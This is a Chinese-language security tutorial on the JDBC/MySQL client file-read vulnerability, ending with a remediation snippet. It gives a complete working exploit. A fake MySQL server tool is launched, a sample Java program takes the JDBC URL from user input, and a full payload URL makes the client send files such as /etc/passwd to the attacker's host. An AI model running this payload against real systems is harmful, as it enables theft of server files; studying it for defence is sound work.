JDBC漏洞利用之客户端文件读取
前序
开局放上一张云舒大佬的一条老微博截图,if 你还不知道这个图中文字啥意思,then 就跟小编一起来一探究竟吧
What is JDBC
JDBC的全称是Java数据库连接(Java Database connect),它是一套用于执行SQL语句的Java API。应用程序可通过这套API连接到关系数据库,并使用SQL语句来完成对数据库中数据的查询、更新和删除等操作。
- 应用程序使用JDBC访问数据库的方式如下图所示:
JDBC的核心组件
- JDBC驱动程序:数据库厂商提供JDBC驱动程序,这些驱动程序是特定于数据库的实现,用于与数据库进行通信。它们遵循JDBC标准,并实现了Java应用程序与数据库交互所需的所有功能。
- JDBC API:它定义了与数据库交互时使用的类和接口。主要的接口包括
Connection
、Statement
、PreparedStatement
、ResultSet
等。 - JDBC Driver Manager:这是JDBC的一部分,用于管理不同类型的数据库驱动程序。它在运行时动态地加载驱动程序,并建立与数据库的连接。
- SQL语句:通过JDBC,可以执行标准的SQL语句来查询和更新数据库。
JDBC的应用场景
开发者为啥用jdbc?这个问题看起来跟本篇文章要去探讨的漏洞原理没啥关系,但是我觉得对于安全人员来说,了解jdbc常见的应用场景有利于提高对于对这个漏洞的感知敏感度
- Web应用程序数据库交互:在基于Java的Web应用程序(如使用Servlets和JSP)中,JDBC常用于实现应用程序与数据库之间的交互,例如用户数据的存取、订单处理、内容管理等。
- 企业级应用:在Java EE(Enterprise Edition)环境中,JDBC通常用于实现企业级应用的数据持久化,例如在ERP(企业资源规划)、CRM(客户关系管理)系统中处理大量的交易和数据。
- 桌面应用程序:在基于Java的桌面应用程序中,JDBC可用于本地数据库的读写操作,例如在财务软件、个人信息管理工具或其他需要本地数据存储的应用中。
- 数据集成:JDBC用于数据集成任务,如ETL(Extract, Transform, Load)过程中的数据提取,或在数据仓库和商业智能系统中集成来自不同数据源的数据。
- 报表和分析:在数据分析和报告应用中,JDBC用于从数据库检索数据,并将其转换为可用于分析和报告的格式。
- 测试和开发工具:开发和测试工具中,JDBC用于创建、管理和维护数据库,例如在自动化测试脚本中进行数据验证和设置测试数据。
- 迁移和转换应用:在数据迁移和转换项目中,JDBC被用于从旧系统读取数据,并将其迁移到新的数据库结构中。
- 云应用程序:在云环境中,JDBC用于与云数据库服务(如Amazon RDS, Google Cloud SQL)进行交互,以便在云中运行的应用程序可以有效地访问和处理数据。
- 物联网(IoT)应用程序:在IoT(物联网)应用中,JDBC可能用于存储和分析从各种设备和传感器收集的数据。
- 微服务架构:在基于微服务的架构中,JDBC可以在单独的服务中用于管理服务特定的数据存储需求。
文件读取原理
JDBC 本身并不提供直接读取本地文件的功能。不过,通过 JDBC 执行 SQL 语句时,如果数据库本身(如 MySQL)支持通过 SQL 命令读取本地文件,那么就可以间接地实现通过jdbc读取文件这一功能。
一个常见的例子是使用 MySQL 的
LOAD DATA INFILE
语句。
插嘴问:喂,为啥看到的文章几乎清一色用mysql举例,别的数据库无法读取文件吗?
插嘴答:第一,我不叫喂,搞错了。。。。。。重来,首先
- MySQL 使用广泛
- MySQL 提供了一种明确且容易理解的方式来演示这种操作,即通过
LOAD DATA INFILE
语句,方便学习 - 其他数据库系统(如 PostgreSQL, Oracle, SQL Server 等)也有自己的方式来处理外部数据和文件操作。例如,Oracle 有
EXTERNAL TABLES
功能,可以用来访问存储在文件系统中的数据。
MySQL读取文件演示
LOAD DATA INFILE
LOAD DATA INFILE
用于从服务器上的文件系统中读取文件,并将数据导入到数据库表中。这要求文件必须位于数据库服务器上,并且MySQL服务器进程必须有权限读取该文件。
基本语法:
LOAD DATA INFILE 'file_path' INTO TABLE table_name;
file_path
:服务器上文件的路径。table_name
:目标表的名称。
示例:
LOAD DATA INFILE '/path/to/data.txt' INTO TABLE my_table;
LOAD DATA LOCAL INFILE
LOAD DATA LOCAL INFILE
类似于 LOAD DATA INFILE
,但它用于从客户端(即连接到数据库的机器)的文件系统中读取文件。
基本语法:
LOAD DATA LOCAL INFILE 'file_path' INTO TABLE table_name;
示例:
如果应用程序允许用户控制这个命令中的文件路径,那么攻击者就有机会让读取 提供服务的 主机上的 任意文件(取决于MySQL服务的权限和操作系统的限制)。
下面sql语句要想成功读取文件内容,mysql-client有一个重要的参数
- 启用/禁用本地文件加载:通过设置
--local-infile=1
或--local-infile=0
,可以在MySQL服务器或客户端启用或禁用LOAD DATA LOCAL INFILE
命令。启用时 (1
),允许使用该命令从客户端文件系统读取文件;禁用时 (0
),则阻止这种操作。
-
连接数据库
mysql --local-infile=1 -h my_ip -u root -p password
-
mysql client读取本地文件并传输到mysql server的表中,
mysql server是由你控制,你可以通过配置文件设置开启允许本地文件读取
SET GLOBAL local_infile = true; // server启用本地数据加载功能,允许从客户端加载本地文件到MySQL服务器中
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test.my_table; //读取本地文件到服务器数据库的表中
成功读取到文件内容:
ALLOW LOAD LOCAL INFILE
在jdbc-mysql-connector sdk中,控制client是否可以load local file的就是这个参数,在5.x和8.x中默认都是false),所以需要在jdbc url中配置allowLoadLocalInfile=true
漏洞利用演示
前置条件
通过前面的了解,我们大概知道,一次有可能成功的jdbc文件读取漏洞的利用,起码要满足几个基本条件,如下所示:
- 可控的JDBC连接字符串:攻击者需要能够控制或修改JDBC连接字符串,且应用程序未正确清理或限制用户输入。
- 服务器的文件系统访问:服务端可以要求客户端读取有可读权限的任何文件。
利用步骤
伪造一个mysql服务器(监听3306端口),这个伪造的mysql服务器可以不实现mysql任何功能(除了向客户端回复 greeting package外),当有其他客户端连接上该服务器时,直接发送读取该客户端上的指定文件的指令(前提是客户端具有该文件读写权限)
准备假mysql服务器
jdbc漏洞利用工具下载地址:https://github.com/4ra1n/mysql-fake-server/releases/download/0.0.4/fake-mysql-cli-0.0.4.jar
启动假的mysql服务器:java -jar fake-mysql-cli-0.0.4.jar -p 3306
假使现在有一个jdbc服务如下所示:
// JDBCExploitDemo.java
import java.sql.Connection;
import java.sql.DriverManager;
import java.util.Scanner;
public class JDBCExploitDemo {
public static void main(String[] args) {
Scanner scanner = new Scanner(System.in);
System.out.println("Enter JDBC URL: ");
String jdbcUrl = scanner.nextLine(); // 用户输入的JDBC URL
try (Connection conn = DriverManager.getConnection(jdbcUrl)) {
System.out.println("Connected to the database successfully.");
} catch (Exception e) {
System.out.println("Connection failed.");
e.printStackTrace();
}
}
}
下载JDBC的mysql对应版本的驱动 : https://downloads.mysql.com/archives/c-j/
# 编译并运行程序,指定驱动路径
javac JDBCExploitDemo.java
java -cp .:mysql-connector-j-8.1.0.jar JDBCExploitDemo
# 输入程序要求的url地址
jdbc:mysql://ip:port/test?user=fileread_/etc/passwd&allowLoadLocalInfile=true
其他连接参数
文件读取的参数
allowLoadLocalInfileInPath=/ 设置读的目录为根目录,这样所有的目录文件都可以读取
allowLoadLocalInfile=true
allowUrlInLocalInfile=true 这两个参数类似
设置包大小参数
maxAllowedPacket=655360
完整payload可以为:
jdbc:mysql://ip:port/test?user=fileread_/etc/passwd&allowLoadLocalInfile=true&allowUrlInLocalInfile=true&allowLoadLocalInfileInPath=/&maxAllowedPacket=655360
查看假mysql服务器是否读取到文件
读取成功的文件会存在fake_mysql工具的同一路径下的fake-server-files
目录中, 进去找到最新的时间戳目录, 进入查看文件
成功读取文件; 实战中大家肯定会遇到一些有限制的情况,大家可以自行再学习一些绕过的方式
TIPS:
当然,实战中输入url的地方一般都长这样
修复方案
原生的场景下可以使用预先定义的Properties将URL中的属性覆盖掉,就可以关闭本地文件读取以及URL读取了。
修复示例:
String driver = "com.mysql.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=test&maxAllowedPacket=655360&allowLoadLocalInfile=true";
Class.forName(driver);
Properties properties = new Properties();
properties.setProperty("allowLoadLocalInfile","false");
properties.setProperty("allowUrlInLocalInfile","false");
properties.setProperty("allowLoadLocalInfileInPath","");
Connection conn = DriverManager.getConnection(DB_URL,properties);